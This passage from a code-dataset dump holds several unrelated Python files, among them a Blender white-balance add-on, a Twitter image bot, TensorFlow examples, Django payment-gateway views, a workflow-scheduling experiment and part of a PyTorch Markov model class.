saver.restore(sess=sess, save_path=checkpoint.model_checkpoint_path)\n\n for epoch in range(100):\n total_loss = 0\n for batch in range(220):\n X_train = sess.run(fetches=next_batch)\n _, get_loss = sess.run(fetches=[train_step, loss], feed_dict={X: X_train})\n total_loss += get_loss\n saver.save(sess=sess, save_path=\"checkpoint/model.ckpt\", global_step=epoch)\n print(\"epoch:\", epoch + 1, \"total loss:\", 
total_loss)\n","sub_path":"TensorFlow/使用自编码网络提取图片2维特征/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"23134459","text":"import bpy\n\nimport bgl\nimport math\n\nfrom .functions import srgb_to_linear\nfrom . import camera\nfrom bpy.props import BoolProperty\n\n# Default Global variables\ndefault_color_temperature = 6500\ndefault_tint = 0\nstored_cm_view_transform = 'Filmic'\ntemperature_ratio = ((23.1818,2000),(6.2195,2200),(4.25,2400),(3.0357,2700),(2.4286,3000),(2.0565,3300),(1.8085,3600),(1.6038,3900),(1.5839,4300),(1.25,5000),(1.0759,6000),(1,6500),(0.8980,8000),(0.851,9000),(0.8118,10000),(0.7843,11000),(0.7647,12000),(0.4706,13000),(0.1176,14000))\n\n#White Balance functions ##############################################################\n\ndef convert_RGB_to_temperature_table(red, blue):\n\n\ttable_ratio = camera.InterpolatedArray(temperature_ratio)\n\n\t# Min and Max ratios from the table\n\tmaxratio = 23.1818\n\tminratio = 0.1176\n\n\t# Make sure to not divide by 0\n\tif blue == 0:\n\t\tratio = minratio\n\telse: ratio = red / blue\n\n\t#Clamping ratio to avoid looking outside of the table\n\tratio = maxratio if ratio > maxratio else minratio if ratio < minratio else ratio\n\n\tcolor_temperature = table_ratio[ratio]\n\n\treturn (color_temperature)\n\ndef convert_RBG_to_whitebalance(picked_color,use_scene_camera):\n\tif use_scene_camera:\n\t\tsettings = bpy.context.scene.camera.data.photographer\n\telse:\n\t\tsettings = bpy.context.camera.photographer\n\t#Need to convert picked color to linear\n\tred = srgb_to_linear(picked_color[0])\n\tgreen = srgb_to_linear(picked_color[1])\n\tblue = srgb_to_linear(picked_color[2])\n\n\taverage = (red + blue) / 2\n\n\t# Calculating Curves values\n\tred_mult = red / average\n\tgreen_mult = green / average\n\tblue_mult = blue / average\n\n\t# # Accurate multiplier to test accuracy of color temperature conversion\n\t# bpy.context.scene.view_settings.curve_mapping.white_level[0] = red_mult\n\t# bpy.context.scene.view_settings.curve_mapping.white_level[1] = green_mult\n\t# bpy.context.scene.view_settings.curve_mapping.white_level[2] = blue_mult\n\n\t# Convert Curve value to Tint\n\tif green_mult < 1 :\n\t\tsettings.tint = (green_mult - 1) * 200 # Reverse Tint Math\n\telse:\n\t\tsettings.tint = (green_mult - 1) * 50 # Reverse Tint Math\n\n\t# Convert Curve value to Temperature\n\tsettings.color_temperature = convert_RGB_to_temperature_table(red_mult,blue_mult)\n\ndef set_picked_white_balance(picked_color,use_scene_camera):\n\tconvert_RBG_to_whitebalance(picked_color,use_scene_camera)\n\nclass PHOTOGRAPHER_OT_WBReset(bpy.types.Operator):\n\tbl_idname = \"white_balance.reset\"\n\tbl_label = \"Reset White Balance\"\n\tbl_description = \"Reset White Balance\"\n\tbl_options = {'UNDO'}\n\n\tuse_scene_camera: BoolProperty(default=False)\n\t\n\tdef execute(self, context):\n\t\tif self.use_scene_camera:\n\t\t\tcontext.scene.camera.data.photographer.color_temperature = default_color_temperature\n\t\t\tcontext.scene.camera.data.photographer.tint = default_tint\t\t\t\n\t\telse:\n\t\t\tcontext.camera.photographer.color_temperature = default_color_temperature\n\t\t\tcontext.camera.photographer.tint = default_tint\n\t\treturn{'FINISHED'}\n\nclass PHOTOGRAPHER_OT_WBPicker(bpy.types.Operator):\n\tbl_idname = \"white_balance.picker\"\n\tbl_label = \"Pick White Balance\"\n\tbl_description = \"Pick a grey area in the 3D view to adjust the White 
Balance\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\t# Create stored values for cancelling\n\tstored_color_temperature = 6500\n\tstored_tint = 0\n\tstored_cm_display_device = \"sRGB\"\n\tstored_cm_view_transform = \"Filmic\"\n\n\tstored_cm_look = \"None\"\n\t\n\tuse_scene_camera: BoolProperty(default=False)\n\n\tdef modal(self, context, event):\n\t\t#context.area.tag_redraw()\n\n\t\t# Reset White Balance to pick raw image, not an already white balanced one\n\t\tif self.use_scene_camera:\n\t\t\tif context.scene.camera.data.photographer.color_temperature != default_color_temperature:\n\t\t\t\tcontext.scene.camera.data.photographer.color_temperature = default_color_temperature\n\t\t\tif context.scene.camera.data.photographer.tint != default_tint:\t\n\t\t\t\tcontext.scene.camera.data.photographer.tint = default_tint\t\t\n\t\telse:\n\t\t\tif context.camera.photographer.color_temperature != default_color_temperature:\n\t\t\t\tcontext.camera.photographer.color_temperature = default_color_temperature\n\t\t\tif context.camera.photographer.tint != default_tint:\n\t\t\t\tcontext.camera.photographer.tint = default_tint\n\t\n\t\t# Disabling color management to be able to convert picked color easily\n\t\tif\tcontext.scene.display_settings.display_device != \"sRGB\":\n\t\t\tcontext.scene.display_settings.display_device = \"sRGB\"\n\t\tif context.scene.view_settings.view_transform != \"Standard\":\n\t\t\tcontext.scene.view_settings.view_transform = \"Standard\"\n\n\t\t# Allow navigation for Blender and Maya shortcuts\n\t\tif event.type in {'MIDDLEMOUSE', 'WHEELUPMOUSE', 'WHEELDOWNMOUSE'} or event.alt and event.type == 'LEFTMOUSE' or event.alt and event.type == 'RIGHTMOUSE':\n\t\t\treturn {'PASS_THROUGH'}\n\n\t\tif event.type == 'LEFTMOUSE':\n\n\t\t\t# Picking color when releasing left mouse button\n\t\t\tif event.value == 'RELEASE' and not self.record:\n\n\t\t\t\tself.record = True\n\t\t\t\tself.mouse_position=(event.mouse_x, event.mouse_y)\n\t\t\t\t# Restore Mouse Cursor from Eyedropper Icon\n\t\t\t\tif self.cursor_set: context.window.cursor_modal_restore()\n\n\t\t\t\tbuf = bgl.Buffer(bgl.GL_FLOAT, [1, 3])\n\t\t\t\tx,y = self.mouse_position\n\n\t\t\t\tred = 0\n\t\t\t\tgreen = 0\n\t\t\t\tblue = 0\n\n\t\t\t\t#Sample a 9*9 pixels square\n\t\t\t\tfor i in range(x-4, x+4):\n\t\t\t\t\tfor j in range(y-4, y+4):\n\t\t\t\t\t\tbgl.glReadPixels(i, j, 1,1 , bgl.GL_RGB, bgl.GL_FLOAT, buf)\n\t\t\t\t\t\tred = red + buf[0][0]\n\t\t\t\t\t\tgreen = green + buf[0][1]\n\t\t\t\t\t\tblue = blue + buf[0][2]\n\n\t\t\t\taverage_r = red / 81\n\t\t\t\taverage_g = green / 81\n\t\t\t\taverage_b = blue / 81\n\n\t\t\t\taverage = [average_r,average_g,average_b]\n\n\t\t\t\t# Sampling pixels under the mouse when released\n\t\t\t\t# bgl.glReadPixels(x, y, 1,1 , bgl.GL_RGB, bgl.GL_FLOAT, buf)\n\t\t\t\t# rgb = buf[0]\n\t\t\t\t# Calculate and apply Color Temperature and Tint\n\t\t\t\tset_picked_white_balance(average,self.use_scene_camera)\n\n\t\t\t\t# Restore Color Management Settings\n\t\t\t\tcontext.scene.display_settings.display_device = self.stored_cm_display_device\n\t\t\t\tcontext.scene.view_settings.view_transform = self.stored_cm_view_transform\n\n\t\t\t\tcontext.scene.view_settings.look = self.stored_cm_look\n\n\t\t\t\treturn {'FINISHED'}\n\n\t\telif event.type in {'RIGHTMOUSE', 'ESC'}:\n\t\t\t# Restore previous settings if cancelled\n\t\t\tif self.use_scene_camera:\n\t\t\t\tcontext.scene.camera.data.photographer.color_temperature = self.stored_color_temperature\n\t\t\t\tcontext.scene.camera.data.photographer.tint = 
self.stored_tint\n\t\t\telse:\n\t\t\t\tcontext.camera.photographer.color_temperature = self.stored_color_temperature\n\t\t\t\tcontext.camera.photographer.tint = self.stored_tint\n\t\t\t\t\n\t\t\t# Restore Color Management Settings\n\t\t\tcontext.scene.display_settings.display_device = self.stored_cm_display_device\n\t\t\tcontext.scene.view_settings.view_transform = self.stored_cm_view_transform\n\t\t\tcontext.scene.view_settings.look = self.stored_cm_look\n\n\t\t\t# Restore Mouse Cursor from Eyedropper Icon\n\t\t\tif self.cursor_set:\n\t\t\t\tcontext.window.cursor_modal_restore()\n\t\t\treturn {'CANCELLED'}\n\n\t\treturn {'RUNNING_MODAL'}\n\n\tdef invoke(self, context, event):\n\t\t\targs = (self, context)\n\t\t\tcontext.window_manager.modal_handler_add(self)\n\n\t\t\t# Set Cursor to Eyedropper icon\n\t\t\tcontext.window.cursor_modal_set('EYEDROPPER')\n\t\t\tself.cursor_set = True\n\t\t\tself.record = False\n\n\t\t\t# Store current white balance settings in case of cancelling\n\t\t\tif self.use_scene_camera:\n\t\t\t\tself.stored_color_temperature = context.scene.camera.data.photographer.color_temperature\n\t\t\t\tself.stored_tint = context.scene.camera.data.photographer.tint\n\t\t\telse:\n\t\t\t\tself.stored_color_temperature = context.camera.photographer.color_temperature\n\t\t\t\tself.stored_tint = context.camera.photographer.tint\n\n\t\t\tself.stored_cm_display_device = context.scene.display_settings.display_device\n\t\t\tself.stored_cm_view_transform = context.scene.view_settings.view_transform\n\n\t\t\tif context.scene.view_settings.look == \"\":\n\t\t\t\tself.stored_cm_look = \"None\"\n\t\t\telse:\n\t\t\t\tself.stored_cm_look = context.scene.view_settings.look\n\n\n\t\t\t# context.area.tag_redraw()\n\t\t\treturn {'RUNNING_MODAL'}","sub_path":"scripts/addons/photographer/white_balance.py","file_name":"white_balance.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"450004383","text":"__author__ = \"Chris Chalmers\"\r\n\r\nimport os, sys, urllib2, datetime\r\nfrom ConfigManager import ConfigManager\r\nfrom DBManager import DBManager\r\nfrom twython import Twython, TwythonError\r\n\r\nclass InspiroBot():\r\n\r\n def __init__(self):\r\n self.config = ConfigManager()\r\n self.dbManager = DBManager(self.config)\r\n self.urlOpener = urllib2.build_opener()\r\n self.urlOpener.addheaders = [('User-Agent', \"Mozilla/5.0\")]\r\n self.client = Twython(self.config.consumerKey,\r\n self.config.consumerSecret,\r\n self.config.accessTokenKey,\r\n self.config.accessTokenSecret)\r\n self.pathToImageDir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__), \"image\"))\r\n\r\n if not os.path.exists(self.pathToImageDir):\r\n os.makedirs(self.pathToImageDir)\r\n\r\n self.getImageURL()\r\n\r\n # Retrieve a URL from InspiroBot\r\n def getImageURL(self):\r\n link = self.urlOpener.open(self.config.inspiroURL).read()\r\n\r\n if not self.dbManager.ContainsLink(link):\r\n # Clear folder\r\n for f in os.listdir(self.pathToImageDir):\r\n os.remove(os.path.join(self.pathToImageDir, \"{}\".format(f)))\r\n\r\n # Download image\r\n print(\"Downloading images from {}...\".format(link))\r\n f = self.urlOpener.open(link)\r\n data = f.read()\r\n with open(os.path.join(self.pathToImageDir, \"image.jpg\"), \"wb\") as code:\r\n code.write(data)\r\n self.uploadImage(link)\r\n else:\r\n self.getImageURL() # Try again\r\n\r\n # Uploads image to Twitter\r\n def uploadImage(self, link):\r\n try:\r\n response = 
self.client.upload_media(media=open(os.path.join(self.pathToImageDir, \"image.jpg\"), 'rb'))\r\n self.client.update_status(status=\"Your daily #InspiroBot image\", media_ids=[response['media_id']])\r\n\r\n # Update DB\r\n self.dbManager.AddToDB(link)\r\n except TwythonError as e:\r\n print(\"Something went wrong uploading image: {}\".format(e))\r\n sys.exit(1)\r\n except Exception as e:\r\n print(\"Something went wrong uploading image: {}\".format(e.message))\r\n sys.exit(1)\r\n\r\nif __name__ == \"__main__\":\r\n InspiroBot()","sub_path":"InspiroBot.py","file_name":"InspiroBot.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"158466601","text":"import tensorflow as tf\nimport pandas as pd\nimport argparse\n\nTRAIN_URL = \"http://download.tensorflow.org/data/iris_training.csv\"\nTEST_URL = \"http://download.tensorflow.org/data/iris_test.csv\"\n\nCSV_COLUMN_NAMES = ['SepalLength', 'SepalWidth',\n 'PetalLength', 'PetalWidth', 'Species']\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', default=100, type=int, help='batch size')\nparser.add_argument('--train_steps', default=100, type=int,\n help='number of training steps')\n\ndef main(argv):\n args = parser.parse_args(argv[1:])\n \n my_checkpointing_config = tf.estimator.RunConfig(\n save_checkpoints_secs = 20*60,\n keep_checkpoint_max = 10\n )\n\n\n\n def load_data(label_name='Species'):\n train_path= tf.keras.utils.get_file(fname=TRAIN_URL.split('/')[-1], \n origin=TRAIN_URL)\n train = pd.read_csv(filepath_or_buffer=train_path, \n names=CSV_COLUMN_NAMES,\n header=0\n )\n\n train_features, train_label = train, train.pop(label_name)\n \n test_path = tf.keras.utils.get_file(TEST_URL.split('/')[-1], TEST_URL)\n test = pd.read_csv(test_path, names=CSV_COLUMN_NAMES, header=0)\n test_features, test_label = test, test.pop(label_name)\n\n # Return four DataFrames.\n return (train_features, train_label), (test_features, test_label)\n\n def train_input_fn(features, labels, batch_size):\n dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))\n dataset = dataset.shuffle(buffer_size=1000).repeat(count=None).batch(batch_size)\n return dataset.make_one_shot_iterator().get_next()\n\n def eval_input_fn(features, labels=None, batch_size=None):\n \"\"\"An input function for evaluation or prediction\"\"\"\n if labels is None:\n inputs = features\n else:\n inputs = (dict(features), labels)\n \n dataset = tf.data.Dataset.from_tensor_slices(inputs)\n\n assert batch_size is not None, \"batch_size must not be None\"\n dataset = dataset.batch(batch_size)\n \n return dataset.make_one_shot_iterator().get_next()\n \n (train_feature, train_label), (test_feature, test_label) = load_data()\n\n my_feature_columns = []\n\n for key in train_feature.keys():\n my_feature_columns.append(tf.feature_column.numeric_column(key=key))\n\n classifier = tf.estimator.DNNClassifier(\n feature_columns=my_feature_columns,\n hidden_units=[10,10],\n n_classes=3,\n model_dir='models/premade_estimator',\n config=my_checkpointing_config)\n\n classifier.train(\n input_fn=lambda:train_input_fn(train_feature, train_label, args.batch_size),\n steps= args.train_steps)\n eval_result = classifier.evaluate(\n input_fn=lambda:eval_input_fn(test_feature, test_label, args.batch_size))\n\n print(\"\\nTest set accuracy: {accuracy:0.3f}\\n\".format(**eval_result))\n\nif __name__== '__main__':\n tf.logging.set_verbosity(tf.logging.INFO)\n 
tf.app.run(main)\n","sub_path":"estimators_beginner_wcp.py","file_name":"estimators_beginner_wcp.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"341223725","text":"import os\nimport pymongo\nfrom os.path import isfile, join\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n# All_handles={\n# \t\"blrcitypolice\":[\"Bangalore City Police\",\"BlrCityPolice\",\"464946996873402\"],\n# \t\"BangaloreTrafficPolice\":[\"Bangalore Traffic Police\",\"blrcitytraffic\",\"147207215344994\"],\n# \t\"GurgaonPolice\":[\"Gurgaon Police\",\"gurgaonpolice1\",\"357011041078922\"],\n# \t\"gnrpolice\":[\"Gandhinagar Police\",\"GnrPolice\",\"182415085299685\"],\n# \t\"hyderabadpolice\":[\"Hyderabad City Police\",\"hydcitypolice\",\"326762537496491\"],\n# \t\"HYDTP\":[\"Hyderabad Traffic Police\",\"HYDTraffic\",\"103022096427538\"],\n# \t\"SikkimPolice\":[\"Sikkim Police\",\"sikkimpolice\",\"348545705193638\"],\n# \t\"Chennai.Police\":[\"Chennai City Police\",\"chennaipolice_\",\"457621584324537\"],\n# \t\"chennaitrafficpolice\":[\"Chennai Traffic Police\",\"cctpolice\",\"141144945912047\"],\n# \t\"dcpnorth\":[\"Delhi Police DCP North\",\"DcpNorthDelhi\",\"408718049271221\"],\n# \t\"AhmedabadTrafficPolice\":[\"Ahmedabad Traffic Police\",\"AhdTraffic\",\"125541044208873\"],\n# \t\"keralatrafficpolice\":[\"Kerela Traffic Police\",\"keralatraffic\",\"837606212949358\"],\n# \t\"UpPolicePr\":[\"UP Police PR\",\"uppolicepr\",\"127726260748187\"],\n# \t\"rohtakrange\":[\"Rohtak Police\",\"RohtakPolice\",\"294138767359123\"],\n# \t\"PoliceCommissionerateFaridabad\":[\"Faridabad Police\",\"CPFbd\",\"497268597013510\"]\n# }\n\ndef getAllHandles():\n\tclient = pymongo.MongoClient()\n\tdb = client.FBPoliceData\n\tpage_info=db.page_names.find()\n\tAll_handles={}\n\tfor pi in page_info:\n\t\tj=db.page_fields.find_one({\"page\":pi[\"page\"]})\n\t\tif j is None:\n\t\t\tcontinue\n\t\tif \"id\" in j.keys():\n\t\t\tAll_handles[pi[\"page\"]]=[pi[\"name\"],pi[\"handle\"],j[\"id\"]]\n\treturn All_handles\n\ndef getId(handle):\n\thandle=handle.encode('utf8')\n\tAll_handles=getAllHandles()\n\treturn All_handles[handle][2]\n\ndef getTitle(handle,platform):\n\thandle=handle.encode('utf8')\n\tAll_handles=getAllHandles()\n\treturn (All_handles[handle][0],All_handles[handle][1])\n\ndef getComparisons(handle,platform):\n\thandle=handle.encode('utf8')\n\tAll_handles=getAllHandles()\n\thandles=All_handles\n\t# print All_handles.keys()\n\toutput_handles={}\n\tfor key in handles.keys():\n\t\tif key!=handle:\n\t\t\toutput_handles[key]=handles[key];\n\n\tif platform==\"twitter\":\n\t\treturn getTwitterTitles(handles)\n\treturn sortHandles(output_handles)\n\ndef getKeywords(keyword):\n\tkeywords=[\"worried\",\"why\",\"want\",\"need\",\"how can\",\"where\",\"fear\",\"trouble\",\"notice of\",\"issue\"]\n\tkeywords.remove(keyword)\n\treturn keywords\n\ndef getTwitterTitles(handles):\n\toutput_handles={}\n\tfor key in handles.keys():\n\t\tif handles[key][1]!=\"\":\n\t\t\toutput_handles[key]=handles[key];\n\treturn sortHandles(output_handles)\n\ndef sortHandles(handles_dict):\n\thandles_list=[]\n\tfor key in handles_dict.keys():\n\t\tdatum={}\n\t\tdatum[\"key\"]=key\n\t\tdatum[\"name\"]=handles_dict[key][0]\n\t\tdatum[\"tw_handle\"]=handles_dict[key][1]\n\t\tdatum[\"fb_id\"]=handles_dict[key][2]\n\t\thandles_list.append(datum)\n\n\tsorted_handles_list = sorted(handles_list, key=lambda k: k['name'])\n\n\treturn 
sorted_handles_list","sub_path":"police_dashboard/tool/functions/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"627982534","text":"import functools\nimport json\nimport os\nimport numpy\n\nfrom heft.algs.ga.GAImplementation.GARunner import MixRunner\nfrom heft.algs.heft.DSimpleHeft import run_heft\nfrom heft.core.CommonComponents.ExperimentalManagers import ExperimentResourceManager\nfrom heft.core.environment.Utility import wf, Utility\nfrom heft.experiments.cga.mobjective.utility import SimpleTimeCostEstimator\nfrom heft.experiments.cga.utilities.common import UniqueNameSaver, repeat\nfrom heft.core.environment.ResourceGenerator import ResourceGenerator as rg\n\n\nwf_names = ['Montage_75']\n# wf_names = ['Montage_50']\n# wf_names = ['Montage_500']\n# wf_names = ['CyberShake_100']\n# wf_names = ['Epigenomics_100']\n# wf_names = [\"CyberShake_50\"]\n\nonly_heft = False\n\nPARAMS = {\n \"ideal_flops\": 20,\n \"is_silent\": False,\n \"is_visualized\": False,\n \"ga_params\": {\n \"Kbest\": 5,\n \"population\": 50,\n \"crossover_probability\": 0.3, #0.8\n \"replacing_mutation_probability\": 0.1, #0.5\n \"sweep_mutation_probability\": 0.3, #0.4\n \"generations\": 100\n },\n \"nodes_conf\": [10, 15, 25, 30],\n \"transfer_time\": 100,\n \"heft_initial\": False\n}\n\nrun = functools.partial(MixRunner(), **PARAMS)\ndirectory = \"../../temp/ga_vs_heft_exp\"\nsaver = UniqueNameSaver(\"../../temp/ga_vs_heft_exp\")\n\n# def do_exp():\n# ga_makespan, heft_makespan, ga_schedule, heft_schedule = run(wf_names[0])\n# saver(ga_makespan)\n# return ga_makespan\n\ndef do_exp_schedule(takeHeftSchedule=True):\n saver = UniqueNameSaver(\"../../temp/ga_vs_heft_exp_heft_schedule\")\n\n ga_makespan, heft_makespan, ga_schedule, heft_schedule = run(wf_names[0])\n\n ## TODO: pure hack\n\n schedule = heft_schedule if takeHeftSchedule else ga_schedule\n\n mapping = [(item.job.id, node.flops) for node, items in schedule.mapping.items() for item in items]\n mapping = sorted(mapping, key=lambda x: x[0])\n\n ordering = [(item.job.id, item.start_time) for node, items in heft_schedule.mapping.items() for item in items]\n ordering = [t for t, time in sorted(ordering, key=lambda x: x[1])]\n\n data = {\n \"mapping\": mapping,\n \"ordering\": ordering\n }\n\n name = saver(data)\n return ga_makespan, heft_makespan, ga_schedule, heft_schedule, name\n\ndef do_exp_heft_schedule():\n res = do_exp_schedule(True)\n return res[0]\n\ndef do_exp_ga_schedule():\n res = do_exp_schedule(False)\n return (res[0], res[4])\n\n\nif __name__ == '__main__':\n print(\"Population size: \" + str(PARAMS[\"ga_params\"][\"population\"]))\n\n _wf = wf(wf_names[0])\n rm = ExperimentResourceManager(rg.r(PARAMS[\"nodes_conf\"]))\n estimator = SimpleTimeCostEstimator(comp_time_cost=0, transf_time_cost=0, transferMx=None,\n ideal_flops=PARAMS[\"ideal_flops\"], transfer_time=PARAMS[\"transfer_time\"])\n\n heft_schedule = run_heft(_wf, rm, estimator)\n heft_makespan = Utility.makespan(heft_schedule)\n overall_transfer = Utility.overall_transfer_time(heft_schedule, _wf, estimator)\n overall_execution = Utility.overall_execution_time(heft_schedule)\n\n print(\"Heft makespan: {0}, Overall transfer time: {1}, Overall execution time: {2}\".format(heft_makespan,\n overall_transfer,\n overall_execution))\n\n if not only_heft:\n result = repeat(do_exp_heft_schedule, 10)\n mean = numpy.mean(result)\n #profit = (1 - mean / heft_makespan) * 
100\n print(result)\n print(\"Heft makespan: {0}, Overall transfer time: {1}, Overall execution time: {2}\".format(heft_makespan,\n overall_transfer,\n overall_execution))\n print(\"Mean: {0}\".format(mean))\n #print(\"Profit: {0}\".format(profit))\n\n\n","sub_path":"heft/experiments/comparison_experiments/GAvsHEFT.py","file_name":"GAvsHEFT.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"168556122","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render, HttpResponse,redirect\nfrom .forms import BuyForm, SettingForm, NotifyUrlResponse, CustomerUrlResponse\nimport hashlib\nfrom django.core.urlresolvers import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom datetime import datetime, timedelta\nfrom .setting import setting \n\n\ndef time():\n return datetime.now()+ timedelta(hours=8)\n\ndef SettingView(request):\n template = 'pay2go/setting.html'\n \n if request.method==\"GET\":\n db = setting()\n db.get()\n context = {}\n context['form'] = SettingForm(initial={\"memberID\":db.memberID, \"hashKEY\":db.hashKEY, \"hashIV\":db.hashIV, \"enable\":db.enable})\n context['date'] = db.date if db.date else \"無\"\n return render(request, template, context)\n \n form = SettingForm(request.POST)\n if form.is_valid():\n memberID = form.cleaned_data['memberID']\n hashKEY = form.cleaned_data['hashKEY']\n hashIV = form.cleaned_data['hashIV']\n enable = form.cleaned_data['enable']\n setting().update(memberID, hashKEY, hashIV, enable, datetime.strftime(time(), '%Y/%m/%d %H:%M:%S'))\n return redirect(reverse(\"pay2go:setting\"))\n \n return render(request, template, {\"form\":form})\n\n@csrf_exempt\ndef NotifyURL(request):\n if request.method==\"POST\":\n form = NotifyUrlResponse(request.POST)\n if form.is_valid():\n MerchantID = form.cleaned_data['MerchantID']\n Amt = form.cleaned_data['Amt']\n MerchantOrderNo = form.cleaned_data['MerchantOrderNo']\n TradeNo = form.cleaned_data['TradeNo']\n if CheckCode(Amt, MerchantOrderNo, TradeNo)==form.cleaned_data['CheckCode']:\n form.save()\n return HttpResponse()\n\ndef CheckCode(MerchantID, Amt, MerchantOrderNo, TradeNo):\n db = setting()\n db.get()\n CheckValue = \"HashIV=\" + db.hashIV\n CheckValue+= \"&Amt=\" + str(Amt)\n CheckValue+= \"&MerchantID=\" + MerchantID\n CheckValue+= \"&MerchantOrderNo=\" + MerchantOrderNo\n CheckValue+= \"&TradeNo=\" + TradeNo\n CheckValue+= \"&HashKey=\" + db.hashKEY\n \n hash_object = hashlib.sha256(CheckValue)\n hex_dig = hash_object.hexdigest()\n return hex_dig.upper()\n\n@csrf_exempt\ndef CustomerURL(request):\n if request.method==\"POST\":\n form = CustomerUrlResponse(request.POST)\n if form.is_valid():\n form.save()\n #data = getDATA(request.POST)\n return HttpResponse()\n\n@csrf_exempt\ndef main(request):\n template = 'pay2go/main.html'\n return render(request, template, {})\n\ndef buy(request):\n template = 'pay2go/buy.html'\n context = {}\n context['datetime']= datetime.strftime(time(), '%Y%m%d %H:%M:%S')\n context['form'] = BuyForm()\n return render(request, template, context )\n\ndef pay2go(request):\n template = 'pay2go/pay2go.html'\n \n if request.method==\"GET\":\n return render(request, template, {})\n \n form = BuyForm(request.POST)\n\n \n if not form.is_valid():\n return render(request, template, {})\n \n MerchantOrderNo = \"TESTNUMBER\" + form.cleaned_data['OrderNumber']\n Amt = form.cleaned_data['cost']\n Email = form.cleaned_data['email']\n ItemDesc = \"測試物品\"\n data = 
BuyData(MerchantOrderNo, Amt, Email, ItemDesc)\n data.host = request.META['HTTP_HOST']\n return render(request, template, {\"BuyData\":data})\n \n \nclass BuyData:\n def __init__(self, MerchantOrderNo, Amt, Email, ItemDesc):\n self.getDB()\n TimeStamp = datetime.strftime(time(), '%Y%m%d')\n \n self.MerchantID = self.memberID\n self.RespondType = \"String\"\n self.TimeStamp = TimeStamp\n self.Version = \"1.1\"\n self.MerchantOrderNo = MerchantOrderNo\n self.Amt = Amt\n self.ItemDesc = ItemDesc\n self.ExpireDate = \"\"\n self.ReturnURL = \"\"\n self.NotifyURL = \"https://phlipb-tw.appspot.com/pay2go/NotifyURL\"\n self.CustomerURL = \"https://phlipb-tw.appspot.com/pay2go/CustomerURL\"\n self.Email = Email\n self.LoginType = \"0\"\n self.CREDIT = \"0\"\n \n self.CheckValue = self.CreateCheckCode(Amt, MerchantOrderNo, TimeStamp)\n \n def getDB(self):\n db = setting()\n db.get()\n self.memberID = db.memberID\n self.hashKEY = db.hashKEY\n self.hashIV = db.hashIV\n self.enable = db.getEnable()\n \n def CreateCheckCode(self, Amt, MerchantOrderNo, TimeStamp):\n CheckValue = \"HashKey=\" + self.hashKEY\n CheckValue+= \"&Amt=\" + Amt\n CheckValue+= \"&MerchantID=\" + self.memberID\n CheckValue+= \"&MerchantOrderNo=\" + MerchantOrderNo\n CheckValue+= \"&TimeStamp=\" + TimeStamp\n CheckValue+= \"&Version=\" + self.Version\n CheckValue+= \"&HashIV=\" + self.hashIV\n hash_object = hashlib.sha256(CheckValue)\n hex_dig = hash_object.hexdigest()\n return hex_dig.upper()\n","sub_path":"test/pay2go/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"137093473","text":"import torch\nimport torch.nn as nn\nimport torch.distributions as dist\nfrom torch.nn.utils.rnn import PackedSequence, pack_sequence\nimport pyblaze.nn as xnn\nfrom pycave.bayes._internal.utils import power_iteration\nfrom .engine import MarkovModelEngine\n\nclass MarkovModel(xnn.Estimator, nn.Module):\n \"\"\"\n The MarkovModel models a simple MarkovChain with a fixed set of states. You may use this class\n whenever states are known and transition probabilities are the only quantity of interest. In\n case of any additional output from the states, consider using the `HMM` model.\n\n In addition to the methods documented below, the Markov model provides the following methods\n as provided by the `estimator mixin `_.\n\n `fit(...)`\n Optimizes the model's parameters.\n\n `evaluate(...)`\n Computes the per-datapoint negative log-likelihood of the given data.\n\n `predict(...)`\n Not available.\n\n The parameters that may be passed to the functions can be derived from the\n `engine documentation `_. The data needs, however, not be passed as a\n PyTorch data loader but all methods also accept the following instead:\n\n * A single packed sequence\n * A single 2-D tensor (interpreted as batch of sequences)\n * A list of packed sequences\n * A list of 2-D tensors (interpreted as batches of sequences)\n\n Additionally, the methods allow the following keyword arguments:\n\n `fit(...)`\n * symmetric: bool, default: False\n Whether a symmetric transition matrix should be learnt from the data (e.g. useful when\n training on random walks from an undirected graph).\n * teleport_alpha: float, default: 0\n The probability of random teleportations from one state to a randomly selected other one\n upon every transition. 
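In effect each step mixes the learnt matrix with a uniform jump, roughly (1 - teleport_alpha) * P + teleport_alpha * U. 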
Generally \"spaces out\" probabilities in the transition\n probability matrix.\n \"\"\"\n\n @property\n def engine(self):\n return MarkovModelEngine(self)\n\n def __init__(self, num_states):\n \"\"\"\n Initializes a new Markov model.\n\n Parameters\n ----------\n num_states: int\n The number of states in the Markov model.\n \"\"\"\n super().__init__()\n\n self.num_states = num_states\n\n self.initial_probs = nn.Parameter(\n torch.empty(self.num_states), requires_grad=False\n )\n self.transition_probs = nn.Parameter(\n torch.empty(self.num_states, self.num_states), requires_grad=False\n )\n\n self.reset_parameters()\n\n def reset_parameters(self):\n \"\"\"\n Resets the parameter of the model by sampling initial probabilities as well as transition\n probabilities from a uniform distribution.\n \"\"\"\n # 1) Initial Probabilities\n self.initial_probs.uniform_()\n self.initial_probs /= self.initial_probs.sum()\n\n # 2) Transition Probabilities\n self.transition_probs.uniform_()\n self.transition_probs /= self.transition_probs.sum(1, keepdim=True)\n\n def forward(self, data):\n \"\"\"\n Runs inference for a single packed sequence, i.e. computes the negative log-likelihood of\n the given sequences.\n\n Parameters\n ----------\n data: 